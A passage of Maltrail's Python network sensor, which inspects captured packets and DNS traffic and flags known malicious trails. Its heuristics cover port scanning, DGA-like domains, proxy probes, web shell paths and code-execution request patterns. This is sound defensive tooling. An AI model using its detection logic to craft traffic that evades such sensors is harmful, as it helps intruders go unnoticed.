"""
pass
|
sensor.py | #!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import warnings
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
warnings.filterwarnings(action="ignore", category=DeprecationWarning) # NOTE: https://github.com/helpsystems/pcapy/pull/67/files
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)
_local_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
elif query.endswith(".ip-adress.com"): # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
_ = '.'.join(parts[:-2])
trail = "%s(.ip-adress.com)" % _
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if not result and trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if result == False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
_sources = set(_.split('~')[0] for _ in _connect_src_dst.keys())
_candidates = [re.sub(r"\d+\.\d+\Z", "", _) for _ in _sources]
_ = sorted(((_candidates.count(_), _) for _ in set(_candidates)), reverse=True)
result = _[0][1] if _ else ""
if result:
_result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
else:
result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
return result or '_'
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
if not _dst_ip.startswith(_get_local_prefix()):
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.rstrip('\\').replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = re.sub(r"(\w+=)[^&=]+", r"\g<1>", path)
if _ not in checks:
checks.append(_)
if _.count('/') > 1:
checks.append("/%s" % _.split('/')[-1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
#_ = os.path.splitext(checks[-1]) # causing FPs in cases like elf_mirai - /juno if legit /juno.php is accessed
#if _[1]:
#checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
